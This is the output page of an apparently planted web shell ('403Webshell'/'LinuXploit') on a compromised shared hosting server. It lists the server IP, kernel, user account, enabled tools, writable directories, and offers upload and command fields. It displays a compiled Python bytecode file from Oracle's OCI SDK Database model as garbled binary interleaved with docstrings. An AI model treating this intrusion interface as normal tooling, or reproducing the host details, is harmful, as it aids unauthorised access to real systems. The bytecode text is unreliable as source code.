403Webshell
Server IP : 162.144.4.212  /  Your IP : 216.73.216.108
Web Server : Apache
System : Linux gator2125.hostgator.com 5.14.0-162.23.1.9991722448259.nf.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 31 18:11:45 UTC 2024 x86_64
User : cozeellc ( 2980)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /usr/lib/python3.9/site-packages/oci/database/models/__pycache__/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /usr/lib/python3.9/site-packages/oci/database/models/__pycache__/database.cpython-39.pyc
a

���f���@s8ddlmZmZmZddlmZeGdd�de��ZdS)�)�formatted_flat_dict�
NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc@s~eZdZdZdZdZdZdZdZdZ	dZ
d	Zd
ZdZ
dd
�Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zed d!��Zejd"d!��Zed#d$��Zejd%d$��Zed&d'��Zejd(d'��Zed)d*��Zejd+d*��Zed,d-��Zejd.d-��Zed/d0��Zejd1d0��Zed2d3��Zejd4d3��Zed5d6��Zejd7d6��Zed8d9��Zejd:d9��Zed;d<��Z e jd=d<��Z ed>d?��Z!e!jd@d?��Z!edAdB��Z"e"jdCdB��Z"edDdE��Z#e#jdFdE��Z#edGdH��Z$e$jdIdH��Z$edJdK��Z%e%jdLdK��Z%edMdN��Z&e&jdOdN��Z&edPdQ��Z'e'jdRdQ��Z'edSdT��Z(e(jdUdT��Z(edVdW��Z)e)jdXdW��Z)edYdZ��Z*e*jd[dZ��Z*ed\d]��Z+e+jd^d]��Z+ed_d`��Z,e,jdad`��Z,edbdc��Z-e-jdddc��Z-ededf��Z.e.jdgdf��Z.edhdi��Z/e/jdjdi��Z/dkdl�Z0dmdn�Z1dodp�Z2dqS)r�Databasez
    Database model.
    �PROVISIONING�	AVAILABLE�UPDATING�BACKUP_IN_PROGRESS�	UPGRADING�
CONVERTING�TERMINATING�
TERMINATED�RESTORE_FAILED�FAILEDc KsJdddddddddddddddddddddddddddd	dddd
�|_ddd
ddddddddddddddddddd d!d"d#d$d%d&d'd(d)d
�|_d*|_d*|_d*|_d*|_d*|_d*|_d*|_d*|_	d*|_
d*|_d*|_d*|_
d*|_d*|_d*|_d*|_d*|_d*|_d*|_d*|_d*|_d*|_d*|_d*|_d*|_d*|_d*|_d*|_d*|_d*|_d*|_ d*S)+a
        Initializes a new Database object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param id:
            The value to assign to the id property of this Database.
        :type id: str

        :param compartment_id:
            The value to assign to the compartment_id property of this Database.
        :type compartment_id: str

        :param character_set:
            The value to assign to the character_set property of this Database.
        :type character_set: str

        :param ncharacter_set:
            The value to assign to the ncharacter_set property of this Database.
        :type ncharacter_set: str

        :param db_home_id:
            The value to assign to the db_home_id property of this Database.
        :type db_home_id: str

        :param db_system_id:
            The value to assign to the db_system_id property of this Database.
        :type db_system_id: str

        :param vm_cluster_id:
            The value to assign to the vm_cluster_id property of this Database.
        :type vm_cluster_id: str

        :param db_name:
            The value to assign to the db_name property of this Database.
        :type db_name: str

        :param pdb_name:
            The value to assign to the pdb_name property of this Database.
        :type pdb_name: str

        :param db_workload:
            The value to assign to the db_workload property of this Database.
        :type db_workload: str

        :param db_unique_name:
            The value to assign to the db_unique_name property of this Database.
        :type db_unique_name: str

        :param lifecycle_details:
            The value to assign to the lifecycle_details property of this Database.
        :type lifecycle_details: str

        :param lifecycle_state:
            The value to assign to the lifecycle_state property of this Database.
            Allowed values for this property are: "PROVISIONING", "AVAILABLE", "UPDATING", "BACKUP_IN_PROGRESS", "UPGRADING", "CONVERTING", "TERMINATING", "TERMINATED", "RESTORE_FAILED", "FAILED", 'UNKNOWN_ENUM_VALUE'.
            Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
        :type lifecycle_state: str

        :param time_created:
            The value to assign to the time_created property of this Database.
        :type time_created: datetime

        :param last_backup_timestamp:
            The value to assign to the last_backup_timestamp property of this Database.
        :type last_backup_timestamp: datetime

        :param last_backup_duration_in_seconds:
            The value to assign to the last_backup_duration_in_seconds property of this Database.
        :type last_backup_duration_in_seconds: int

        :param last_failed_backup_timestamp:
            The value to assign to the last_failed_backup_timestamp property of this Database.
        :type last_failed_backup_timestamp: datetime

        :param db_backup_config:
            The value to assign to the db_backup_config property of this Database.
        :type db_backup_config: oci.database.models.DbBackupConfig

        :param freeform_tags:
            The value to assign to the freeform_tags property of this Database.
        :type freeform_tags: dict(str, str)

        :param defined_tags:
            The value to assign to the defined_tags property of this Database.
        :type defined_tags: dict(str, dict(str, object))

        :param connection_strings:
            The value to assign to the connection_strings property of this Database.
        :type connection_strings: oci.database.models.DatabaseConnectionStrings

        :param kms_key_id:
            The value to assign to the kms_key_id property of this Database.
        :type kms_key_id: str

        :param kms_key_version_id:
            The value to assign to the kms_key_version_id property of this Database.
        :type kms_key_version_id: str

        :param vault_id:
            The value to assign to the vault_id property of this Database.
        :type vault_id: str

        :param source_database_point_in_time_recovery_timestamp:
            The value to assign to the source_database_point_in_time_recovery_timestamp property of this Database.
        :type source_database_point_in_time_recovery_timestamp: datetime

        :param database_software_image_id:
            The value to assign to the database_software_image_id property of this Database.
        :type database_software_image_id: str

        :param is_cdb:
            The value to assign to the is_cdb property of this Database.
        :type is_cdb: bool

        :param database_management_config:
            The value to assign to the database_management_config property of this Database.
        :type database_management_config: oci.database.models.CloudDatabaseManagementConfig

        :param sid_prefix:
            The value to assign to the sid_prefix property of this Database.
        :type sid_prefix: str

        :param key_store_id:
            The value to assign to the key_store_id property of this Database.
        :type key_store_id: str

        :param key_store_wallet_name:
            The value to assign to the key_store_wallet_name property of this Database.
        :type key_store_wallet_name: str

        �strZdatetime�intZDbBackupConfigzdict(str, str)zdict(str, dict(str, object))ZDatabaseConnectionStrings�boolZCloudDatabaseManagementConfig)�id�compartment_id�
character_set�ncharacter_set�
db_home_id�db_system_id�
vm_cluster_id�db_name�pdb_name�db_workload�db_unique_name�lifecycle_details�lifecycle_state�time_created�last_backup_timestamp�last_backup_duration_in_seconds�last_failed_backup_timestamp�db_backup_config�
freeform_tags�defined_tags�connection_strings�
kms_key_id�kms_key_version_id�vault_id�0source_database_point_in_time_recovery_timestamp�database_software_image_id�is_cdb�database_management_config�
sid_prefix�key_store_id�key_store_wallet_namerZ
compartmentIdZcharacterSetZ
ncharacterSetZdbHomeIdZ
dbSystemIdZvmClusterIdZdbNameZpdbNameZ
dbWorkloadZdbUniqueNameZlifecycleDetailsZlifecycleStateZtimeCreatedZlastBackupTimestampZlastBackupDurationInSecondsZlastFailedBackupTimestampZdbBackupConfigZfreeformTagsZdefinedTagsZconnectionStringsZkmsKeyIdZkmsKeyVersionIdZvaultIdZ*sourceDatabasePointInTimeRecoveryTimestampZdatabaseSoftwareImageIdZisCdbZdatabaseManagementConfigZ	sidPrefixZ
keyStoreIdZkeyStoreWalletNameN)!Z
swagger_typesZ
attribute_map�_id�_compartment_id�_character_set�_ncharacter_set�_db_home_id�
_db_system_id�_vm_cluster_id�_db_name�	_pdb_name�_db_workload�_db_unique_name�_lifecycle_details�_lifecycle_state�
_time_created�_last_backup_timestamp� _last_backup_duration_in_seconds�_last_failed_backup_timestamp�_db_backup_config�_freeform_tags�
_defined_tags�_connection_strings�_kms_key_id�_kms_key_version_id�	_vault_id�1_source_database_point_in_time_recovery_timestamp�_database_software_image_id�_is_cdb�_database_management_config�_sid_prefix�
_key_store_id�_key_store_wallet_name)�self�kwargs�rT�@/usr/lib/python3.9/site-packages/oci/database/models/database.py�__init__:s��#�"zDatabase.__init__cCs|jS)z�
        **[Required]** Gets the id of this Database.
        The `OCID`__ of the database.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The id of this Database.
        :rtype: str
        �r3�rRrTrTrUr"szDatabase.idcCs
||_dS)z�
        Sets the id of this Database.
        The `OCID`__ of the database.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param id: The id of this Database.
        :type: str
        NrW)rRrrTrTrUr0scCs|jS)a
        **[Required]** Gets the compartment_id of this Database.
        The `OCID`__ of the compartment.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The compartment_id of this Database.
        :rtype: str
        �r4rXrTrTrUr>szDatabase.compartment_idcCs
||_dS)a
        Sets the compartment_id of this Database.
        The `OCID`__ of the compartment.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param compartment_id: The compartment_id of this Database.
        :type: str
        NrY)rRrrTrTrUrLscCs|jS)z�
        Gets the character_set of this Database.
        The character set for the database.


        :return: The character_set of this Database.
        :rtype: str
        �r5rXrTrTrUrZs
zDatabase.character_setcCs
||_dS)z�
        Sets the character_set of this Database.
        The character set for the database.


        :param character_set: The character_set of this Database.
        :type: str
        NrZ)rRrrTrTrUrfs
cCs|jS)z�
        Gets the ncharacter_set of this Database.
        The national character set for the database.


        :return: The ncharacter_set of this Database.
        :rtype: str
        �r6rXrTrTrUrrs
zDatabase.ncharacter_setcCs
||_dS)z�
        Sets the ncharacter_set of this Database.
        The national character set for the database.


        :param ncharacter_set: The ncharacter_set of this Database.
        :type: str
        Nr[)rRrrTrTrUr~s
cCs|jS)z�
        Gets the db_home_id of this Database.
        The `OCID`__ of the Database Home.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The db_home_id of this Database.
        :rtype: str
        �r7rXrTrTrUr�szDatabase.db_home_idcCs
||_dS)a
        Sets the db_home_id of this Database.
        The `OCID`__ of the Database Home.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param db_home_id: The db_home_id of this Database.
        :type: str
        Nr\)rRrrTrTrUr�scCs|jS)z�
        Gets the db_system_id of this Database.
        The `OCID`__ of the DB system.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The db_system_id of this Database.
        :rtype: str
        �r8rXrTrTrUr�szDatabase.db_system_idcCs
||_dS)a
        Sets the db_system_id of this Database.
        The `OCID`__ of the DB system.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param db_system_id: The db_system_id of this Database.
        :type: str
        Nr])rRrrTrTrUr�scCs|jS)a
        Gets the vm_cluster_id of this Database.
        The `OCID`__ of the VM cluster.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The vm_cluster_id of this Database.
        :rtype: str
        �r9rXrTrTrUr�szDatabase.vm_cluster_idcCs
||_dS)a
        Sets the vm_cluster_id of this Database.
        The `OCID`__ of the VM cluster.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param vm_cluster_id: The vm_cluster_id of this Database.
        :type: str
        Nr^)rRrrTrTrUr�scCs|jS)z�
        **[Required]** Gets the db_name of this Database.
        The database name.


        :return: The db_name of this Database.
        :rtype: str
        �r:rXrTrTrUr�s
zDatabase.db_namecCs
||_dS)z�
        Sets the db_name of this Database.
        The database name.


        :param db_name: The db_name of this Database.
        :type: str
        Nr_)rRrrTrTrUr�s
cCs|jS)as
        Gets the pdb_name of this Database.
        The name of the pluggable database. The name must begin with an alphabetic character and can contain a maximum of thirty alphanumeric characters. Special characters are not permitted. Pluggable database should not be same as database name.


        :return: The pdb_name of this Database.
        :rtype: str
        �r;rXrTrTrUr�s
zDatabase.pdb_namecCs
||_dS)az
        Sets the pdb_name of this Database.
        The name of the pluggable database. The name must begin with an alphabetic character and can contain a maximum of thirty alphanumeric characters. Special characters are not permitted. Pluggable database should not be same as database name.


        :param pdb_name: The pdb_name of this Database.
        :type: str
        Nr`)rRrrTrTrUrs
cCs|jS)aQ
        Gets the db_workload of this Database.
        **Deprecated.** The dbWorkload field has been deprecated for Exadata Database Service on Dedicated Infrastructure, Exadata Database Service on Cloud@Customer, and Base Database Service.
        Support for this attribute will end in November 2023. You may choose to update your custom scripts to exclude the dbWorkload attribute. After November 2023 if you pass a value to the dbWorkload attribute, it will be ignored.

        The database workload type.


        :return: The db_workload of this Database.
        :rtype: str
        �r<rXrTrTrUrs
zDatabase.db_workloadcCs
||_dS)a[
        Sets the db_workload of this Database.
        **Deprecated.** The dbWorkload field has been deprecated for Exadata Database Service on Dedicated Infrastructure, Exadata Database Service on Cloud@Customer, and Base Database Service.
        Support for this attribute will end in November 2023. You may choose to update your custom scripts to exclude the dbWorkload attribute. After November 2023 if you pass a value to the dbWorkload attribute, it will be ignored.

        The database workload type.


        :param db_workload: The db_workload of this Database.
        :type: str
        Nra)rRrrTrTrUrs
cCs|jS)aQ
        **[Required]** Gets the db_unique_name of this Database.
        A system-generated name for the database to ensure uniqueness within an Oracle Data Guard group (a primary database and its standby databases). The unique name cannot be changed.


        :return: The db_unique_name of this Database.
        :rtype: str
        �r=rXrTrTrUr,s
zDatabase.db_unique_namecCs
||_dS)aO
        Sets the db_unique_name of this Database.
        A system-generated name for the database to ensure uniqueness within an Oracle Data Guard group (a primary database and its standby databases). The unique name cannot be changed.


        :param db_unique_name: The db_unique_name of this Database.
        :type: str
        Nrb)rRrrTrTrUr8s
cCs|jS)z�
        Gets the lifecycle_details of this Database.
        Additional information about the current lifecycle state.


        :return: The lifecycle_details of this Database.
        :rtype: str
        �r>rXrTrTrUrDs
zDatabase.lifecycle_detailscCs
||_dS)z�
        Sets the lifecycle_details of this Database.
        Additional information about the current lifecycle state.


        :param lifecycle_details: The lifecycle_details of this Database.
        :type: str
        Nrc)rRrrTrTrUrPs
cCs|jS)a�
        **[Required]** Gets the lifecycle_state of this Database.
        The current state of the database.

        Allowed values for this property are: "PROVISIONING", "AVAILABLE", "UPDATING", "BACKUP_IN_PROGRESS", "UPGRADING", "CONVERTING", "TERMINATING", "TERMINATED", "RESTORE_FAILED", "FAILED", 'UNKNOWN_ENUM_VALUE'.
        Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.


        :return: The lifecycle_state of this Database.
        :rtype: str
        )r?rXrTrTrUr \s
zDatabase.lifecycle_statecCs gd�}t||�sd}||_dS)z�
        Sets the lifecycle_state of this Database.
        The current state of the database.


        :param lifecycle_state: The lifecycle_state of this Database.
        :type: str
        )
rrr	r
rrr
rrrZUNKNOWN_ENUM_VALUEN)rr?)rRr Zallowed_valuesrTrTrUr ks

cCs|jS)z�
        Gets the time_created of this Database.
        The date and time the database was created.


        :return: The time_created of this Database.
        :rtype: datetime
        �r@rXrTrTrUr!zs
zDatabase.time_createdcCs
||_dS)z�
        Sets the time_created of this Database.
        The date and time the database was created.


        :param time_created: The time_created of this Database.
        :type: datetime
        Nrd)rRr!rTrTrUr!�s
cCs|jS)z�
        Gets the last_backup_timestamp of this Database.
        The date and time when the latest database backup was created.


        :return: The last_backup_timestamp of this Database.
        :rtype: datetime
        �rArXrTrTrUr"�s
zDatabase.last_backup_timestampcCs
||_dS)z�
        Sets the last_backup_timestamp of this Database.
        The date and time when the latest database backup was created.


        :param last_backup_timestamp: The last_backup_timestamp of this Database.
        :type: datetime
        Nre)rRr"rTrTrUr"�s
cCs|jS)z�
        Gets the last_backup_duration_in_seconds of this Database.
        The duration when the latest database backup created.


        :return: The last_backup_duration_in_seconds of this Database.
        :rtype: int
        �rBrXrTrTrUr#�s
z(Database.last_backup_duration_in_secondscCs
||_dS)a
        Sets the last_backup_duration_in_seconds of this Database.
        The duration when the latest database backup created.


        :param last_backup_duration_in_seconds: The last_backup_duration_in_seconds of this Database.
        :type: int
        Nrf)rRr#rTrTrUr#�s
cCs|jS)z�
        Gets the last_failed_backup_timestamp of this Database.
        The date and time when the latest database backup failed.


        :return: The last_failed_backup_timestamp of this Database.
        :rtype: datetime
        �rCrXrTrTrUr$�s
z%Database.last_failed_backup_timestampcCs
||_dS)a
        Sets the last_failed_backup_timestamp of this Database.
        The date and time when the latest database backup failed.


        :param last_failed_backup_timestamp: The last_failed_backup_timestamp of this Database.
        :type: datetime
        Nrg)rRr$rTrTrUr$�s
cCs|jS)z�
        Gets the db_backup_config of this Database.

        :return: The db_backup_config of this Database.
        :rtype: oci.database.models.DbBackupConfig
        �rDrXrTrTrUr%�szDatabase.db_backup_configcCs
||_dS)z�
        Sets the db_backup_config of this Database.

        :param db_backup_config: The db_backup_config of this Database.
        :type: oci.database.models.DbBackupConfig
        Nrh)rRr%rTrTrUr%�scCs|jS)a�
        Gets the freeform_tags of this Database.
        Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
        For more information, see `Resource Tags`__.

        Example: `{"Department": "Finance"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The freeform_tags of this Database.
        :rtype: dict(str, str)
        �rErXrTrTrUr&�szDatabase.freeform_tagscCs
||_dS)a�
        Sets the freeform_tags of this Database.
        Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
        For more information, see `Resource Tags`__.

        Example: `{"Department": "Finance"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param freeform_tags: The freeform_tags of this Database.
        :type: dict(str, str)
        Nri)rRr&rTrTrUr&�scCs|jS)a
        Gets the defined_tags of this Database.
        Defined tags for this resource. Each key is predefined and scoped to a namespace.
        For more information, see `Resource Tags`__.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The defined_tags of this Database.
        :rtype: dict(str, dict(str, object))
        �rFrXrTrTrUr's
zDatabase.defined_tagscCs
||_dS)a�
        Sets the defined_tags of this Database.
        Defined tags for this resource. Each key is predefined and scoped to a namespace.
        For more information, see `Resource Tags`__.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param defined_tags: The defined_tags of this Database.
        :type: dict(str, dict(str, object))
        Nrj)rRr'rTrTrUr's
cCs|jS)a
        Gets the connection_strings of this Database.
        The Connection strings used to connect to the Oracle Database.


        :return: The connection_strings of this Database.
        :rtype: oci.database.models.DatabaseConnectionStrings
        �rGrXrTrTrUr(.s
zDatabase.connection_stringscCs
||_dS)a
        Sets the connection_strings of this Database.
        The Connection strings used to connect to the Oracle Database.


        :param connection_strings: The connection_strings of this Database.
        :type: oci.database.models.DatabaseConnectionStrings
        Nrk)rRr(rTrTrUr(:s
cCs|jS)a	
        Gets the kms_key_id of this Database.
        The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.


        :return: The kms_key_id of this Database.
        :rtype: str
        �rHrXrTrTrUr)Fs
zDatabase.kms_key_idcCs
||_dS)a
        Sets the kms_key_id of this Database.
        The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.


        :param kms_key_id: The kms_key_id of this Database.
        :type: str
        Nrl)rRr)rTrTrUr)Rs
cCs|jS)a
        Gets the kms_key_version_id of this Database.
        The OCID of the key container version that is used in database transparent data encryption (TDE) operations KMS Key can have multiple key versions. If none is specified, the current key version (latest) of the Key Id is used for the operation. Autonomous Database Serverless does not use key versions, hence is not applicable for Autonomous Database Serverless instances.


        :return: The kms_key_version_id of this Database.
        :rtype: str
        �rIrXrTrTrUr*^s
zDatabase.kms_key_version_idcCs
||_dS)a
        Sets the kms_key_version_id of this Database.
        The OCID of the key container version that is used in database transparent data encryption (TDE) operations KMS Key can have multiple key versions. If none is specified, the current key version (latest) of the Key Id is used for the operation. Autonomous Database Serverless does not use key versions, hence is not applicable for Autonomous Database Serverless instances.


        :param kms_key_version_id: The kms_key_version_id of this Database.
        :type: str
        Nrm)rRr*rTrTrUr*js
cCs|jS)a�
        Gets the vault_id of this Database.
        The `OCID`__ of the Oracle Cloud Infrastructure `vault`__. This parameter and `secretId` are required for Customer Managed Keys.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
        __ https://docs.cloud.oracle.com/Content/KeyManagement/Concepts/keyoverview.htm#concepts


        :return: The vault_id of this Database.
        :rtype: str
        �rJrXrTrTrUr+vs
zDatabase.vault_idcCs
||_dS)a�
        Sets the vault_id of this Database.
        The `OCID`__ of the Oracle Cloud Infrastructure `vault`__. This parameter and `secretId` are required for Customer Managed Keys.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
        __ https://docs.cloud.oracle.com/Content/KeyManagement/Concepts/keyoverview.htm#concepts


        :param vault_id: The vault_id of this Database.
        :type: str
        Nrn)rRr+rTrTrUr+�s
cCs|jS)a�
        Gets the source_database_point_in_time_recovery_timestamp of this Database.
        Point in time recovery timeStamp of the source database at which cloned database system is cloned from the source database system, as described in `RFC 3339`__

        __ https://tools.ietf.org/rfc/rfc3339


        :return: The source_database_point_in_time_recovery_timestamp of this Database.
        :rtype: datetime
        �rKrXrTrTrUr,�sz9Database.source_database_point_in_time_recovery_timestampcCs
||_dS)a�
        Sets the source_database_point_in_time_recovery_timestamp of this Database.
        Point in time recovery timeStamp of the source database at which cloned database system is cloned from the source database system, as described in `RFC 3339`__

        __ https://tools.ietf.org/rfc/rfc3339


        :param source_database_point_in_time_recovery_timestamp: The source_database_point_in_time_recovery_timestamp of this Database.
        :type: datetime
        Nro)rRr,rTrTrUr,�scCs|jS)a
        Gets the database_software_image_id of this Database.
        The database software image `OCID`__

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The database_software_image_id of this Database.
        :rtype: str
        �rLrXrTrTrUr-�sz#Database.database_software_image_idcCs
||_dS)a8
        Sets the database_software_image_id of this Database.
        The database software image `OCID`__

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param database_software_image_id: The database_software_image_id of this Database.
        :type: str
        Nrp)rRr-rTrTrUr-�scCs|jS)z�
        Gets the is_cdb of this Database.
        True if the database is a container database.


        :return: The is_cdb of this Database.
        :rtype: bool
        �rMrXrTrTrUr.�s
zDatabase.is_cdbcCs
||_dS)z�
        Sets the is_cdb of this Database.
        True if the database is a container database.


        :param is_cdb: The is_cdb of this Database.
        :type: bool
        Nrq)rRr.rTrTrUr.�s
cCs|jS)z�
        Gets the database_management_config of this Database.

        :return: The database_management_config of this Database.
        :rtype: oci.database.models.CloudDatabaseManagementConfig
        �rNrXrTrTrUr/�sz#Database.database_management_configcCs
||_dS)z�
        Sets the database_management_config of this Database.

        :param database_management_config: The database_management_config of this Database.
        :type: oci.database.models.CloudDatabaseManagementConfig
        Nrr)rRr/rTrTrUr/�scCs|jS)z�
        Gets the sid_prefix of this Database.
        Specifies a prefix for the `Oracle SID` of the database to be created.


        :return: The sid_prefix of this Database.
        :rtype: str
        �rOrXrTrTrUr0�s
zDatabase.sid_prefixcCs
||_dS)z�
        Sets the sid_prefix of this Database.
        Specifies a prefix for the `Oracle SID` of the database to be created.


        :param sid_prefix: The sid_prefix of this Database.
        :type: str
        Nrs)rRr0rTrTrUr0s
cCs|jS)a

        Gets the key_store_id of this Database.
        The `OCID`__ of the key store of Oracle Vault.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :return: The key_store_id of this Database.
        :rtype: str
        �rPrXrTrTrUr1szDatabase.key_store_idcCs
||_dS)a
        Sets the key_store_id of this Database.
        The `OCID`__ of the key store of Oracle Vault.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm


        :param key_store_id: The key_store_id of this Database.
        :type: str
        Nrt)rRr1rTrTrUr1scCs|jS)z�
        Gets the key_store_wallet_name of this Database.
        The wallet name for Oracle Key Vault.


        :return: The key_store_wallet_name of this Database.
        :rtype: str
        �rQrXrTrTrUr2,s
zDatabase.key_store_wallet_namecCs
||_dS)z�
        Sets the key_store_wallet_name of this Database.
        The wallet name for Oracle Key Vault.


        :param key_store_wallet_name: The key_store_wallet_name of this Database.
        :type: str
        Nru)rRr2rTrTrUr28s
cCst|�S�N)rrXrTrTrU�__repr__DszDatabase.__repr__cCs|durdS|j|jkS)NF)�__dict__�rR�otherrTrTrU�__eq__GszDatabase.__eq__cCs
||kSrvrTryrTrTrU�__ne__MszDatabase.__ne__N)3�__name__�
__module__�__qualname__�__doc__ZLIFECYCLE_STATE_PROVISIONINGZLIFECYCLE_STATE_AVAILABLEZLIFECYCLE_STATE_UPDATINGZ"LIFECYCLE_STATE_BACKUP_IN_PROGRESSZLIFECYCLE_STATE_UPGRADINGZLIFECYCLE_STATE_CONVERTINGZLIFECYCLE_STATE_TERMINATINGZLIFECYCLE_STATE_TERMINATEDZLIFECYCLE_STATE_RESTORE_FAILEDZLIFECYCLE_STATE_FAILEDrV�propertyr�setterrrrrrrrrrrrr r!r"r#r$r%r&r'r(r)r*r+r,r-r.r/r0r1r2rwr{r|rTrTrTrUrsi












































	
	






















	
	







rN)Zoci.utilrrrZoci.decoratorsr�objectrrTrTrTrU�<module>s

Youez - 2016 - github.com/yon3zu
LinuXploit